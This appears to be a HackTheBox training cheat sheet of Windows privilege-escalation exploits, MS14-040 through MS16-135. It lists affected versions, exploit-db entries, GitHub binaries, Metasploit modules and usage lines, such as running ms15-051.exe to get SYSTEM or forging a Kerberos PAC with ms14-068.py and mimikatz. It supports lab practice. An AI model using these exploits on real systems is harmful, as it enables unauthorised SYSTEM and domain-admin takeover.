Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems; Windows Vista SP2; Windows Vista x64 Edition SP2; Windows Server 2008 for 32-bit Systems SP2; Windows Server 2008 for x64-based Systems SP2; Windows Server 2008 for Itanium-based Systems SP2; Windows 7 for 32-bit Systems SP1; Windows 7 for x64-based Systems SP1; Windows Server 2008 R2 for x64-based Systems SP1; Windows Server 2008 R2 for Itanium-based Systems SP1; Windows 8 for 32-bit Systems; Windows 8 for x64-based Systems; Windows 8.1 for 32-bit Systems[2] (2973408); Windows 8.1 for x64-based Systems; Windows Server 2012; Windows Server 2012 R2; Windows RT[3] (2961072); Windows RT 8.1[1][3] (2961072)
exploit-db
Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
Tested on: Win7 x32; afd.sys 6.1.7600.16385; ntdll.dll 6.1.7600.16385 (these are Windows 7 SP0 builds, so compare the target's afd.sys version before trying)
github
MS14-40-x32.py, 39525.py, 39446.py, MS14-40-x86.exe, MS14-040-x64.exe
metasploit
no
more information
MS14-058 (high)
affected version
Windows Server 2003, Windows Server 2008, Windows Server 2012, 7, 8: Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems; Windows Vista SP2; Windows Vista x64 Edition SP2; Windows Server 2008 for 32-bit Systems SP2; Windows Server 2008 for x64-based Systems SP2; Windows Server 2008 for Itanium-based Systems SP2; Windows 7 for 32-bit Systems SP1; Windows 7 for x64-based Systems SP1; Windows Server 2008 R2 for x64-based Systems SP1; Windows Server 2008 R2 for Itanium-based Systems SP1; Windows 8 for 32-bit Systems; Windows 8 for x64-based Systems; Windows 8.1 for 32-bit Systems; Windows 8.1 for x64-based Systems; Windows Server 2012; Windows Server 2012 R2; Windows RT[1] (3000061); Windows RT 8.1[1] (3000061); plus the Server Core installations of Windows Server 2008 SP2 (32-bit and x64) and Windows Server 2008 R2 SP1 (x64)
exploit-db
Microsoft Windows Kernel - 'win32k.sys' Local Privilege Escalation (MS14-058)
(the exploit-db entry is a text file that only contains a URL)
Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)
github
MS14-058.exe, Exploit.exe
metasploit
exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.
more information
MS14-068 (medium)
affected version
Windows Server 2003; Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems; Windows Vista SP2; Windows Vista x64 Edition SP2; Windows Server 2008 for 32-bit Systems SP2; Windows Server 2008 for x64-based Systems SP2; Windows Server 2008 for Itanium-based Systems SP2; Windows 7 for 32-bit Systems SP1; Windows 7 for x64-based Systems SP1; Windows Server 2008 R2 for x64-based Systems SP1; Windows Server 2008 R2 for Itanium-based Systems SP1; Windows 8 for 32-bit Systems; Windows 8 for x64-based Systems; Windows 8.1 for 32-bit Systems; Windows 8.1 for x64-based Systems; Windows Server 2012; Windows Server 2012 R2; plus the Server Core installations of Windows Server 2008 SP2 (32-bit and x64) and Windows Server 2008 R2 SP1 (x64)
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
This is a domain-level escalation (a forged PAC accepted by an unpatched domain controller), not a kernel bug: you need a valid domain user's password, that user's SID (whoami /user) and network access to a domain controller. The script writes a Kerberos ccache, which is then injected (for example with mimikatz kerberos::ptc) to act as a domain administrator.
exploit-db
Microsoft Windows Kerberos - Privilege Escalation (MS14-068)
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
github
USAGE: ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
metasploit
auxiliary/admin/kerberos/ms14_068_kerberos_checksum 2014-11-18 normal MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
more information
MS14-070 (high)
affected version
Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems
exploit-db
Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)
Vulnerable software: Windows 2003 SP2 x86, x86-64 and IA-64. Supported by the exploit: Windows 2003 SP2 x86. Tested on: Windows 2003 SP2 x86 EN
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)
Affected product: TCP/IP Protocol Driver (tcpip.sys); affected version: 5.2.3790.4573; platform: Microsoft Windows Server 2003 SP2; architecture: x86, x64, Itanium
github
35936.exe, 37755.exe
metasploit
exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys can allow a local attacker to trigger a NULL pointer dereference by using a specially crafted IOCTL. This flaw can be abused to elevate privileges to SYSTEM.
more information
Granny privesc (MS14-070) WITHOUT meterpreter
MS15_004 (medium)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3019978) Windows RT 8.1[1] (3019978) Windows Server 2008 R2 for x64-based Systems Service Pack 1
exploit-db
Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)
Protected Mode (Windows 7) / 32 bits
www.exploit-db.com
github
no??
metasploit
exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
more information
MS15-010 (medium)
affected version
Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3013455) Windows RT 8.1[1] (3013455)
exploit-db
Microsoft Windows - Local Privilege Escalation (MS15-010)
www.exploit-db.com
Microsoft Windows 8.1 - 'win32k' Local Privilege Escalation (MS15-010)
# Version: Windows 8.1 (x64)
# Tested on: Windows 8.1 (x64)
have exe URL
www.exploit-db.com
github
39035.exe
github.com
metasploit
no
more information
MS15-051 (high)
affected version
Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3045171) Windows RT 8.1[1] (3045171) Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for x64-based Systems Service Pack 1
Title : ClientCopyImage Win32k
CVEID : 2015-1701, 2015-2433
exploit-db
Microsoft Windows - ClientCopyImage Win32k (MS15-051) (Metasploit)
Link : https://www.exploit-db.com/exploits/37367/
www.exploit-db.com
Microsoft Windows - Local Privilege Escalation (MS15-051)
have exe URL
www.exploit-db.com
github
37049-32.exe Taihou32.exe Taihou64.exe ms15-051.exe ms15-051x64.exe
ms15-051x64.exe works!!
github.com
have exe URL
ms15-051/Win32/ms15-051.exe works!!!
ms15-051/x64/ms15-051.exe
usage ms15-051.exe whoami
github.com
metasploit
exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.
more information
MS15-076 (medium)
affected version
Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Server 2003 R2 Service Pack 2 Windows Server 2003 R2 x64 Edition Service Pack 2 Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3067505) Windows RT 8.1[1] (3067505)
exploit-db
Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)
Copies a file to any privileged location on disk
Usage: trebuchet.exe C:\Users\Bob\Evil.txt C:\Windows\System32\Evil.dll
Exploit can only be run once every 2-3 minutes. This is because RPC can be held up by LocalSystem
Tested on x64/x86 Windows 7/8.1
The destination file can't already exist
github
Trebuchet.exe Microsoft.VisualStudio.OLE.Interop.dll
github.com
metasploit
no
more information
MS15-078 (medium)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3079904) Windows RT 8.1[1] (3079904) Windows 10 for 32-bit Systems[1] (3074683) Windows 10 for x64-based Systems[1] (3074683)
MS15-078 : Font Driver Buffer Overflow
This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing a malformed font. The vulnerability was exploited by Hacking Team and disclosed in the July data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64.
exploit-db
Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit)
www.exploit-db.com
github
no??
metasploit
exploit/windows/local/ms15_078_atmfd_bof 2015-07-11 manual MS15-078 Microsoft Windows Font Driver Buffer Overflow
more information
MS15-102 (low)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8 for 32-bit Systems Windows 8 for x64-based Systems Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT[1] (3082089) Windows RT[1] (3084135) Windows RT 8.1[1] (3082089) Windows RT 8.1[1] (3084135) Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for x64-based Systems Service Pack 1
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
exploit-db
have exe URL
38202/bin/CreateObjectTaskCPP.exe
[*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
/root/Documents/OSCP-LABO/HTB/Arctic/
www.exploit-db.com
have ps1 URL
38200.ps1
[*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
Platform: Windows 8.1 Update, looks like it should work on 7 and 10 as well
www.exploit-db.com
have exe URL
38201/bin/CreateObjectTaskCPP.exe
[*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
Platform: Windows 8.1 Update (I don’t believe it’s available in earlier Windows versions)
www.exploit-db.com
github
no??
metasploit
no
more information
MS16-014 (high)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT 8.1[1] (3126587) Windows RT 8.1[1] (3126593) Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for x64-based Systems Service Pack 1
exploit-db
Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)
# Version: Windows 7 SP1 x86
# Tested on: Windows 7 SP1 x86
Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)
# Tested on: Windows 7 Professional (x32/x64)
# CVE : CVE-2016-0049
???????????????????????????? txt
github
ms16-014.rar ms16-014.exe ms16-014.exe
usage ms16-014.exe whoami ???????
github.com
metasploit
exploit/windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Windows WMI Recieve Notification Exploit
more information
MS16-016 (high)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
exploit-db
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
have exe URL
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
# Version:WebDAV on Windows 7 84x
spawn SYSTEM shell in **current** window
https://www.exploit-db.com/exploits/39788
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
https://www.exploit-db.com/exploits/39788/ spawn SYSTEM shell in **new** window
https://www.exploit-db.com/exploits/39432
github
BSoD.exe EoP.exe
spawn SYSTEM shell in new window
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016
metasploit
exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.
more information
MS16-032 (high)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT 8.1 [1] (3139914) Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems
exploit-db
Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) (PowerShell)
www.exploit-db.com
Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)
www.exploit-db.com
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#)
www.exploit-db.com
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)
www.exploit-db.com
github
x86/ms16-032.exe x64/ms16-032.exe MS16-032.ps1
spawn SYSTEM shell in new window
github.com
metasploit
exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. This module exploits the lack of sanitization of standard handles in Windows Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.
more information
MS16-034 (very low)
affected version
(XP/Vista/Win7/Win8/2000/2003/2008/2012)
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
exploit-db
no??
github
FillRgn_BSoD.cpp MS16-034-exp.cpp
cannot compile
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
github.com
metasploit
no
more information
MS16-075 (medium)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT 8.1 Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems
Hot potato
exploit-db
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)
seems not to work....????
www.exploit-db.com
github
Tater.ps1 (seems to work) potato.exe ms16-075.rb (metasploit module)
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
poc.py attack.py constant.py httpserver.py secretsdump.py smbclient.py webclient.py
????
github.com
metasploit
above
more information
MS16-098 (high)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows RT 8.1[1] (3177725) Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 Version 1607 for x64-based Systems
exploit-db
Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)
.c have exe URL
41020.exe
www.exploit-db.com
Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)
have exe URL
MS16-098.exe
www.exploit-db.com
github
bfill.exe
github.com
Windows 8.1 x64 Exploit for MS16-098 RNGOBJ_Integer_Overflow
have bfill.exe
github.com
metasploit
no
more information
MS16-135 (high)
affected version
Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Windows 8.1 for 32-bit Systems Windows 8.1 for x64-based Systems Windows Server 2012 Windows Server 2012 R2 Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems Windows Server 2016 for x64-based Systems
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
exploit-db
Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)
have exe URL
41015.exe
www.exploit-db.com
Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (1)
40823/code/ASLRSideChannelAttack/compiled/ASLRSideChannelAttack.exe
have exe URL
www.exploit-db.com
github
MS16-135
https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
github.com
41015.exe MS16-135.ps1 SetWindowLongPtr_Exploit.exe
spawn SYSTEM shell in current window
github.com
MS16-135.ps1
github.com
metasploit
no
more information
Closing remarks
Privilege escalation on HackTheBox Windows machines is very often a kernel exploit. I figured that, instead of searching for exploits with the suggester every single time, it would be faster to just learn them, so I put this together.
I have also made a similar cheat sheet for exploits of the Linux sudo command.
Of these 30 or so, the ones I think come up most often on HTB are MS10-092, MS11-046, MS15-051 and MS16-032. There are of course others as well.